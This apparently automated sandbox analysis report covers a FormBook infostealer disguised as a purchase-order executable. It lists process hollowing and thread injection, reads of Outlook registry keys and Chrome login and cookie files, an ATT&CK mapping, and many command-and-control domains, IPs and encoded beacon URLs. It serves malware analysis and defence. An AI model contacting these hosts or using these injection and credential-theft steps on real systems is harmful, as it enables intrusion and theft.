          Source: C:\Windows\explorer.exeDomain query: www.new-thinking.digital
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.90.105 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tobewell.store
          Source: C:\Windows\explorer.exeDomain query: www.700544.com
          Source: C:\Windows\explorer.exeDomain query: www.amspustaka.com
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 38.163.214.169 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.spirituallyzen.com
          Source: C:\Windows\explorer.exeNetwork Connect: 216.40.34.41 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 380000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\jaxdij.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeProcess created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.kJump to behavior
          Source: explorer.exe, 00000003.00000000.367643427.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.313822910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.376579579.00000000086B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.313822910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.391418068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.362128973.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000000.313822910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.391418068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.362128973.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.313822910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.391418068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.362128973.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.313336465.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.390965323.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.361602747.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0024D985 cpuid 1_2_0024D985
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0024D612 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_0024D612
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          Registry Run Keys / Startup Folder          		512
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder          		2
          Obfuscated Files or Information          		21
          Input Capture          		2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Masquerading          		Security Account Manager15
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Virtualization/Sandbox Evasion          		NTDS131
          Security Software Discovery          		Distributed Component Object Model21
          Input Capture          		Scheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script512
          Process Injection          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSH2
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Rundll32          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 755933 Sample: New PO-RJ-IN-003 - Knauf Qu... Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 3 other signatures 2->61 10 New PO-RJ-IN-003 - Knauf Queimados.exe 19 2->10         started        process3 file4 35 C:\Users\user\AppData\Local\...\nsqB9A3.tmp, COM 10->35 dropped 37 C:\Users\user\AppData\Local\Temp\jaxdij.exe, PE32 10->37 dropped 13 jaxdij.exe 1 2 10->13         started        process5 file6 39 C:\Users\user\AppData\...\rubthqnwyfue.exe, PE32 13->39 dropped 79 Multi AV Scanner detection for dropped file 13->79 81 Machine Learning detection for dropped file 13->81 83 Maps a DLL or memory area into another process 13->83 17 jaxdij.exe 13->17         started        signatures7 process8 signatures9 47 Modifies the context of a thread in another process (thread injection) 17->47 49 Maps a DLL or memory area into another process 17->49 51 Sample uses process hollowing technique 17->51 53 Queues an APC in another process (thread injection) 17->53 20 explorer.exe 17->20 injected process10 dnsIp11 41 tobewell.store 178.208.83.20, 49740, 49741, 49742 VDSINA-ASRU Russian Federation 20->41 43 gmrsnodes.com 192.185.90.105, 49713, 49714, 49715 UNIFIEDLAYER-AS-1US United States 20->43 45 19 other IPs or domains 20->45 63 System process connects to network (likely due to code injection or exploit) 20->63 65 Performs DNS queries to domains with low reputation 20->65 24 rundll32.exe 13 20->24         started        27 rubthqnwyfue.exe 20->27         started        29 rubthqnwyfue.exe 20->29         started        signatures12 process13 signatures14 67 Tries to steal Mail credentials (via file / registry access) 24->67 69 Tries to harvest and steal browser information (history, passwords, etc) 24->69 71 Modifies the context of a thread in another process (thread injection) 24->71 73 Maps a DLL or memory area into another process 24->73 75 Multi AV Scanner detection for dropped file 27->75 77 Machine Learning detection for dropped file 27->77 31 WerFault.exe 3 10 27->31         started        33 WerFault.exe 10 29->33         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          New PO-RJ-IN-003 - Knauf Queimados.exe28%ReversingLabsWin32.Trojan.Jaik
          New PO-RJ-IN-003 - Knauf Queimados.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\jaxdij.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\jaxdij.exe12%ReversingLabs
          C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe12%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.New PO-RJ-IN-003 - Knauf Queimados.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.2.jaxdij.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.New PO-RJ-IN-003 - Knauf Queimados.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.0.jaxdij.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.jaxdij.exe.600000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.spirituallyzen.com/m9ae/0%Avira URL Cloudsafe
          http://www.tobewell.store/m9ae/0%Avira URL Cloudsafe
          http://www.spirituallyzen.com/m9ae/?F6z4=4ec4fK6CMrtHuja3pViXkl8dlfKAbA0cl+B6ZD+yu2XjTt2h0hV8coMCjgRVKURuW2bGAgNBkAmkGWEjBIBjWi0t+MmK3uNJiA==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.amspustaka.com/m9ae/?F6z4=qV5DC7gvSDrvRRGewn1q/I/EwjqoLGbs6Pm0OHOL9iW03iXh+4kaxlrb2hUer6xMCUxzC2FjXkfJjvQV3jFRWlDNN37fVrd03A==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.oonrreward.xyz0%Avira URL Cloudsafe
          http://www.frwqc.com/m9ae/?F6z4=pynBU+gmcVJLvmAk24XYTH3CuEH61wNq2RizpB0aNcQM45kGiq+MbQwB99t5gTqC+tvIVg5qQAlCnSYFpOBmFRnmyN3XSGsj5w==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.lee-perez.com/m9ae/?F6z4=nJLDtYwD0af/ePmsJ0ZKjiSVJI8rGVPKc+UQspc6K5yuMKQDKTWfrb6tVbro5/Rq1DJ6W8y/y+8M88qCUODrzxtLw2C30JMyEA==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.bookmygennie.com/m9ae/0%Avira URL Cloudsafe
          http://www.ybkos.link/m9ae/0%Avira URL Cloudsafe
          http://www.tobewell.store/m9ae/?F6z4=IYAlNlE+FJHaxy8xKQwy2r7+8XL3SaTnyfpqtFACBxvA1+IYQm/X+/KTYzdsJPpQzBa/f1IulPzZtkKHtHHlpgqy4oXa9op1jw==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.amspustaka.com/m9ae/0%Avira URL Cloudsafe
          http://www.new-thinking.digital/m9ae/?F6z4=yeGgPnkUyrtnR7ayT+iAJkQi5P+hLqfzRu7/UIGlFriReHTN1+d7DIiWZVVmKJ4cvvB3dwEDWmLuBMYDpMvfxEUSQC8X9wPCmA==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.700544.com/m9ae/0%Avira URL Cloudsafe
          http://www.lee-perez.com/m9ae/0%Avira URL Cloudsafe
          http://www.frwqc.com/m9ae/0%Avira URL Cloudsafe
          http://www.bookmygennie.com/m9ae/?F6z4=6mtkb9sgLdU5EKgBox+sPzjX7gz7/N2rxrRH87049IJ0dh9Tn6WPD5ftVfyzJnBGA3PJpfJHiW/BJrwPQwZWSWvRAWejN4CLLw==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L70%Avira URL Cloudsafe
          www.spirituallyzen.com/m9ae/0%Avira URL Cloudsafe
          http://www.publickit.website/m9ae/?F6z4=XxObD+bozu8R8o86HZokIAwRDcTSUgt1X0zVs8jY2xx2j7amGX2Nanqc4HjuSpD/F/TSiqNoyiNwTcXhTU7ob6qQALfoq6EoqQ==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.tommy57.shop/m9ae/?F6z4=SKemUsRCc/T/1VtJMmoBZUTfzvZVAKOrpHPFHv5bIcLS1NPOIJ3jWavklE8DT12a+oeWOwZfdDSidPGYCemgiB/muCJBu0rQaA==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.dailyheraldresearch.com/m9ae/?F6z4=q+GqSbkO5kqO+W9u2R8uyv/azK/Tyw9Ktq6EIVL87IABA33EfP0KANVapKUQlEGAPHMNZ2Czo2C9EtWkfzzg2b9ydKIDbcUulA==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.porggiret.site/m9ae/?F6z4=la9UBuDbTkNYLSjTdKhHvd+t7tYwPiF7FtZOQELnOBzejFZlEJsWuQ55NoeYz7TqoHjnmCP3NdRIHdLBoOXytpXMXLmthCtowg==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.dailyheraldresearch.com/m9ae/0%Avira URL Cloudsafe
          http://www.porggiret.site/m9ae/0%Avira URL Cloudsafe
          http://www.ybkos.link/m9ae/?F6z4=19Acn/cRxsS2hMIvbksqz2Fo9/tvE3PmoTWmDY67F7eOm0DJL1plqZyOKvwSm3g2XK4MIkQK6hC8KTphNB2J9vZOQC2YpVwH6g==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.gmrsnodes.com/m9ae/0%Avira URL Cloudsafe
          http://www.gmrsnodes.com/m9ae/?F6z4=mwF44ViOu9spAX9yiKWO/GCmf5D0pm7R930/p+8373gvxGpTfL4o/Lm9AHizqU6H72eF1eWgDLpzZ2SfuF6Kyw289k0D2VxhyA==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.700544.com/m9ae/?F6z4=Mu7XrmbNuBpRkVuoTBGU/iHqS/OhVA7Any/uXbqYT12baRfdD/rxJiFT6KJrK4J1cV2pSA20UCfshAzQrgjlnBPfig9iswk20g==&mN6Hg=kRq8Chx0sXs4Nnu00%Avira URL Cloudsafe
          http://www.new-thinking.digital/m9ae/0%Avira URL Cloudsafe
          http://www.publickit.website/m9ae/0%Avira URL Cloudsafe
          http://www.tommy57.shop/m9ae/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.porggiret.site
          		198.54.121.81
          		truetrue
            		unknown
            www.dailyheraldresearch.com
            		172.67.214.243
            		truetrue
              		unknown
              www.ybkos.link
              		107.148.15.81
              		truetrue
                		unknown
                tobewell.store
                		178.208.83.20
                		truetrue
                  		unknown
                  www.tommy57.shop
                  		74.208.236.65
                  		truetrue
                    		unknown
                    www.bookmygennie.com
                    		38.163.214.169
                    		truetrue
                      		unknown
                      www.new-thinking.digital
                      		62.233.121.61
                      		truetrue
                        		unknown
                        www.oonrreward.xyz
                        		188.114.97.3
                        		truetrue
                          		unknown
                          pp.3105.net
                          		93.179.127.27
                          		truetrue
                            		unknown
                            gmrsnodes.com
                            		192.185.90.105
                            		truetrue
                              		unknown
                              www.frwqc.com
                              		38.40.166.195
                              		truetrue
                                		unknown
                                amspustaka.com
                                		23.111.12.177
                                		truetrue
                                  		unknown
                                  www.spirituallyzen.com
                                  		74.208.236.214
                                  		truetrue
                                    		unknown
                                    publickit.website
                                    		206.83.40.92
                                    		truetrue
                                      		unknown
                                      www.lee-perez.com
                                      		216.40.34.41
                                      		truetrue
                                        		unknown
                                        www.publickit.website
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.davidemarone.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.gmrsnodes.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.tobewell.store
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.700544.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.amspustaka.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.amspustaka.com/m9ae/?F6z4=qV5DC7gvSDrvRRGewn1q/I/EwjqoLGbs6Pm0OHOL9iW03iXh+4kaxlrb2hUer6xMCUxzC2FjXkfJjvQV3jFRWlDNN37fVrd03A==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    www.spirituallyzen.com/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.frwqc.com/m9ae/?F6z4=pynBU+gmcVJLvmAk24XYTH3CuEH61wNq2RizpB0aNcQM45kGiq+MbQwB99t5gTqC+tvIVg5qQAlCnSYFpOBmFRnmyN3XSGsj5w==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tobewell.store/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lee-perez.com/m9ae/?F6z4=nJLDtYwD0af/ePmsJ0ZKjiSVJI8rGVPKc+UQspc6K5yuMKQDKTWfrb6tVbro5/Rq1DJ6W8y/y+8M88qCUODrzxtLw2C30JMyEA==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ybkos.link/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.bookmygennie.com/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.spirituallyzen.com/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.spirituallyzen.com/m9ae/?F6z4=4ec4fK6CMrtHuja3pViXkl8dlfKAbA0cl+B6ZD+yu2XjTt2h0hV8coMCjgRVKURuW2bGAgNBkAmkGWEjBIBjWi0t+MmK3uNJiA==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.amspustaka.com/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tobewell.store/m9ae/?F6z4=IYAlNlE+FJHaxy8xKQwy2r7+8XL3SaTnyfpqtFACBxvA1+IYQm/X+/KTYzdsJPpQzBa/f1IulPzZtkKHtHHlpgqy4oXa9op1jw==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lee-perez.com/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.700544.com/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.new-thinking.digital/m9ae/?F6z4=yeGgPnkUyrtnR7ayT+iAJkQi5P+hLqfzRu7/UIGlFriReHTN1+d7DIiWZVVmKJ4cvvB3dwEDWmLuBMYDpMvfxEUSQC8X9wPCmA==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.bookmygennie.com/m9ae/?F6z4=6mtkb9sgLdU5EKgBox+sPzjX7gz7/N2rxrRH87049IJ0dh9Tn6WPD5ftVfyzJnBGA3PJpfJHiW/BJrwPQwZWSWvRAWejN4CLLw==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.frwqc.com/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.publickit.website/m9ae/?F6z4=XxObD+bozu8R8o86HZokIAwRDcTSUgt1X0zVs8jY2xx2j7amGX2Nanqc4HjuSpD/F/TSiqNoyiNwTcXhTU7ob6qQALfoq6EoqQ==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tommy57.shop/m9ae/?F6z4=SKemUsRCc/T/1VtJMmoBZUTfzvZVAKOrpHPFHv5bIcLS1NPOIJ3jWavklE8DT12a+oeWOwZfdDSidPGYCemgiB/muCJBu0rQaA==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.dailyheraldresearch.com/m9ae/?F6z4=q+GqSbkO5kqO+W9u2R8uyv/azK/Tyw9Ktq6EIVL87IABA33EfP0KANVapKUQlEGAPHMNZ2Czo2C9EtWkfzzg2b9ydKIDbcUulA==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.dailyheraldresearch.com/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.porggiret.site/m9ae/?F6z4=la9UBuDbTkNYLSjTdKhHvd+t7tYwPiF7FtZOQELnOBzejFZlEJsWuQ55NoeYz7TqoHjnmCP3NdRIHdLBoOXytpXMXLmthCtowg==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ybkos.link/m9ae/?F6z4=19Acn/cRxsS2hMIvbksqz2Fo9/tvE3PmoTWmDY67F7eOm0DJL1plqZyOKvwSm3g2XK4MIkQK6hC8KTphNB2J9vZOQC2YpVwH6g==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.porggiret.site/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.gmrsnodes.com/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.gmrsnodes.com/m9ae/?F6z4=mwF44ViOu9spAX9yiKWO/GCmf5D0pm7R930/p+8373gvxGpTfL4o/Lm9AHizqU6H72eF1eWgDLpzZ2SfuF6Kyw289k0D2VxhyA==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.700544.com/m9ae/?F6z4=Mu7XrmbNuBpRkVuoTBGU/iHqS/OhVA7Any/uXbqYT12baRfdD/rxJiFT6KJrK4J1cV2pSA20UCfshAzQrgjlnBPfig9iswk20g==&mN6Hg=kRq8Chx0sXs4Nnu0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.new-thinking.digital/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.publickit.website/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tommy57.shop/m9ae/true
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabrundll32.exe, 0000000B.00000003.485044441.0000000007231000.00000004.00000800.00020000.00000000.sdmp, 456b6ELMQ.11.drfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=456b6ELMQ.11.drfalse
                                                        		high
                                                        https://www.instagram.com/hover_domainsrundll32.exe, 0000000B.00000002.823746464.000000000540E000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.824795992.0000000006FA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://supportservices.easyspace.com/rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://controlpanel.easyspace.com/rundll32.exe, 0000000B.00000002.824187605.0000000005D7A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              		high
